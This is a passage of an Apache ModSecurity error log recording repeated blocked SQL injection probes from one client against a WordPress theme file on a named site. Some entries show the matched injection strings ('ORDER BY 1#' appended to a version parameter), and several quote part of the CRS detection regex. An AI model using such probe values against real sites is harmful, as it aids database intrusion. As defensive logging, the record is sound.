"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGpHug2jzbr_AlO3d0IQAAANc"] [Sun Jul 07 16:20:37.873668 2024] [:error] [pid 30828:tid 139722575791872] [client 141.98.81.37:38068] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGpTbJWLg2ecbngu9JfAAAAIs"] [Sun Jul 07 16:20:39.041106 2024] [:error] [pid 31926:tid 139722533828352] [client 141.98.81.37:38070] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGp3ug2jzbr_AlO3d0IgAAANA"] [Sun Jul 07 16:20:39.971088 2024] [:error] [pid 30828:tid 139722567399168] [client 141.98.81.37:38072] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGpzbJWLg2ecbngu9JfQAAAIw"] [Sun Jul 07 16:20:40.985470 2024] [:error] [pid 31926:tid 139722508650240] [client 141.98.81.37:38074] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGqHug2jzbr_AlO3d0IwAAANM"] [Sun Jul 07 16:20:41.987601 2024] [:error] [pid 30828:tid 139722600969984] [client 141.98.81.37:38076] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGqTbJWLg2ecbngu9JfgAAAIg"] [Sun Jul 07 16:20:43.139016 2024] [:error] [pid 30828:tid 139722550613760] [client 141.98.81.37:38078] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGqzbJWLg2ecbngu9JfwAAAI4"] [Sun Jul 07 16:20:44.161077 2024] [:error] [pid 31926:tid 139722517042944] [client 141.98.81.37:38082] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGrHug2jzbr_AlO3d0JAAAANI"] [Sun Jul 07 16:20:45.262633 2024] [:error] [pid 30828:tid 139722617755392] [client 141.98.81.37:38084] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGrTbJWLg2ecbngu9JgAAAAIY"] [Sun Jul 07 16:20:46.404528 2024] [:error] [pid 30828:tid 139722634540800] [client 141.98.81.37:38086] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGrjbJWLg2ecbngu9JgQAAAIQ"] [Sun Jul 07 16:20:47.395513 2024] [:error] [pid 30828:tid 139722584184576] [client 141.98.81.37:38088] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGrzbJWLg2ecbngu9JggAAAIo"] [Sun Jul 07 16:20:48.458333 2024] [:error] [pid 30828:tid 139722525435648] [client 141.98.81.37:38090] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGsDbJWLg2ecbngu9JgwAAAJE"] [Sun Jul 07 16:20:49.417046 2024] [:error] [pid 30828:tid 139722668111616] [client 141.98.81.37:38092] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGsTbJWLg2ecbngu9JhAAAAIA"] [Sun Jul 07 16:20:50.468605 2024] [:error] [pid 30828:tid 139722475079424] [client 141.98.81.37:38094] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGsjbJWLg2ecbngu9JhQAAAJc"] [Sun Jul 07 16:20:51.561598 2024] [:error] [pid 31926:tid 139722609362688] [client 141.98.81.37:38102] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGs3ug2jzbr_AlO3d0JQAAAMc"] [Sun Jul 07 16:20:52.550606 2024] [:error] [pid 30826:tid 139722617755392] [client 141.98.81.37:38112] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGtPcO2IzqYGkif72pQgAAAAY"] [Sun Jul 07 16:20:53.594404 2024] [:error] [pid 30826:tid 139722500257536] [client 141.98.81.37:38128] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGtfcO2IzqYGkif72pQwAAABQ"] [Sun Jul 07 16:20:54.600130 2024] [:error] [pid 30826:tid 139722634540800] [client 141.98.81.37:38132] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGtvcO2IzqYGkif72pRAAAAAQ"] [Sun Jul 07 16:20:55.927111 2024] [:error] [pid 30828:tid 139722483472128] [client 141.98.81.37:38134] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGtzbJWLg2ecbngu9JhwAAAJY"] [Sun Jul 07 16:20:56.942197 2024] [:error] [pid 30828:tid 139722500257536] [client 141.98.81.37:38136] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGuDbJWLg2ecbngu9JiAAAAJQ"] [Sun Jul 07 16:20:57.981110 2024] [:error] [pid 30828:tid 139722592577280] [client 141.98.81.37:38138] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGuTbJWLg2ecbngu9JiQAAAIk"] [Sun Jul 07 16:20:59.683636 2024] [:error] [pid 30828:tid 139722559006464] [client 141.98.81.37:38140] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGuzbJWLg2ecbngu9JigAAAI0"] [Sun Jul 07 16:21:00.415105 2024] [:error] [pid 31926:tid 139722592577280] [client 141.98.81.37:38142] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGvHug2jzbr_AlO3d0JwAAAMk"] [Sun Jul 07 16:21:01.411097 2024] [:error] [pid 31926:tid 139722500257536] [client 141.98.81.37:38144] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGvXug2jzbr_AlO3d0KAAAANQ"] [Sun Jul 07 16:21:02.394877 2024] [:error] [pid 30827:tid 139722609362688] [client 141.98.81.37:38146] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGvkGuaLybMBNkB61uMwAAAEc"] [Sun Jul 07 16:21:03.340682 2024] [:error] [pid 31926:tid 139722642933504] [client 141.98.81.37:38148] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGv3ug2jzbr_AlO3d0KQAAAMM"] [Sun Jul 07 16:21:04.375653 2024] [:error] [pid 31926:tid 139722659718912] [client 141.98.81.37:38150] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGwHug2jzbr_AlO3d0KgAAAME"] [Sun Jul 07 16:21:05.498387 2024] [:error] [pid 30828:tid 139722575791872] [client 141.98.81.37:38154] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGwTbJWLg2ecbngu9JiwAAAIs"] [Sun Jul 07 16:21:06.566909 2024] [:error] [pid 31926:tid 139722626148096] [client 141.98.81.37:38156] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGwnug2jzbr_AlO3d0KwAAAMU"] [Sun Jul 07 16:21:07.566796 2024] [:error] [pid 30828:tid 139722659718912] [client 141.98.81.37:38158] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGwzbJWLg2ecbngu9JjAAAAIE"] [Sun Jul 07 16:21:08.645290 2024] [:error] [pid 30828:tid 139722600969984] [client 141.98.81.37:38160] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGxDbJWLg2ecbngu9JjQAAAIg"] [Sun Jul 07 16:21:09.706307 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:38168] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b 